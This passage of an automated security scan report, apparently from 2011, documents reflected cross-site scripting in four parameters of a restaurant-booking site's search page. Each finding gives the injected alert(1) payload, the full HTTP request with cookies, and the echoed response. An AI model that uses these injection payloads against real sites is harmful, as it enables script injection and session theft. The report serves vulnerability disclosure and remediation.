Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Vary: Accept-Encoding
Content-Length: 41401


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
perties.Response.FinalDistanceUsed = -1;
ResultProperties.Response.DistanceBubbleUpExecuted = false;
ResultProperties.Response.MapViewTabLink = 'opentables-map.aspx?rid=90&restref=90&m=4&t=single&p=2e8520';alert(1)//d273cd86d21&d=10/3/2011 7:00 PM&rtype=ism_mod&rp=opentables.aspx&mode=map';
ResultProperties.Response.BaseURL = 'httphandlers/opentables-lite.aspx?aj=1';
ResultProperties.InResults.Prices = new Hash({});
Resul
...[SNIP]...

4.66. http://www.opentable.com/opentables.aspx [restref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /opentables.aspx

Issue detail

The value of the restref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ace1b'%3balert(1)//78f95f9005e was submitted in the restref parameter. This input was echoed as ace1b';alert(1)//78f95f9005e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opentables.aspx?rid=90&restref=90ace1b'%3balert(1)//78f95f9005e&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:54 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: restrefwhite=200; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a54&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=3&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=3&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=3&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Vary: Accept-Encoding
Content-Length: 44265


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
':''};
ResultProperties.Response.FinalDistanceUsed = -1;
ResultProperties.Response.DistanceBubbleUpExecuted = false;
ResultProperties.Response.MapViewTabLink = 'opentables-map.aspx?rid=90&restref=90ace1b';alert(1)//78f95f9005e&m=4&t=single&p=2&d=10/3/2011 7:00 PM&rtype=ism_mod&rp=opentables.aspx&mode=map';
ResultProperties.Response.BaseURL = 'httphandlers/opentables-lite.aspx?aj=1';
ResultProperties.InResults.Prices = [2]
...[SNIP]...

4.67. http://www.opentable.com/opentables.aspx [rid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /opentables.aspx

Issue detail

The value of the rid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e5d7'%3balert(1)//598a6a122be was submitted in the rid parameter. This input was echoed as 2e5d7';alert(1)//598a6a122be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opentables.aspx?rid=902e5d7'%3balert(1)//598a6a122be&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:53 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a53&p1q=rid%3d90%26restref%3d90%26m%3d4%26t%3dsingle%26p%3d2&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=100&rr1=90&rr2=90; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=3&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Vary: Accept-Encoding
Content-Length: 38316


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
, 'mapimage':''};
ResultProperties.Response.FinalDistanceUsed = -1;
ResultProperties.Response.DistanceBubbleUpExecuted = false;
ResultProperties.Response.MapViewTabLink = 'opentables-map.aspx?rid=902e5d7';alert(1)//598a6a122be&restref=90&m=4&t=single&p=2&d=10/3/2011 7:00 PM&rtype=ism_mod&rp=opentables.aspx&mode=map';
ResultProperties.Response.BaseURL = 'httphandlers/opentables-lite.aspx?aj=1';
ResultProperties.InResults.P
...[SNIP]...

4.68. http://www.opentable.com/opentables.aspx [rtype parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /opentables.aspx

Issue detail

The value of the rtype request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 579ed'%3balert(1)//e3acda3f130 was submitted in the rtype parameter. This input was echoed as 579ed';alert(1)//e3acda3f130 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod579ed'%3balert(1)//e3acda3f130 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:55:00 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a55%3a00&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=90&rra=1; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref''&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=duSsdwBsMHJDxcQVxTQ3GQ%3d%3d&ts=3&st=5&js=0; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=4&vbefreg=4&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref''&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=duSsdwBsMHJDxcQVxTQ3GQ%3d%3d&ts=3&st=5&js=0; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref''&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=duSsdwBsMHJDxcQVxTQ3GQ%3d%3d&ts=3&st=5&js=0; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Vary: Accept-Encoding
Content-Length: 46298


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
= -1;
ResultProperties.Response.DistanceBubbleUpExecuted = false;
ResultProperties.Response.MapViewTabLink = 'opentables-map.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011 7:00 PM&rtype=ism_mod579ed';alert(1)//e3acda3f130&rp=opentables.aspx&mode=map';
ResultProperties.Response.BaseURL = 'httphandlers/opentables-lite.aspx?aj=1';
ResultProperties.InResults.Prices = [2];
ResultProperties.InResults.Neighborhoods = new H
...[SNIP]...

4.69. http://www.opentable.com/opentables.aspx [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /opentables.aspx

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cad25'%3balert(1)//adac89be721 was submitted in the t parameter. This input was echoed as cad25';alert(1)//adac89be721 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opentables.aspx?rid=90&restref=90&m=4&t=singlecad25'%3balert(1)//adac89be721&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:56 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a56&p1q=rid%3d20076a25%2500%250d%250aadc5f31fe0d%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=90&rra=1; domain=.opentable.com; path=/
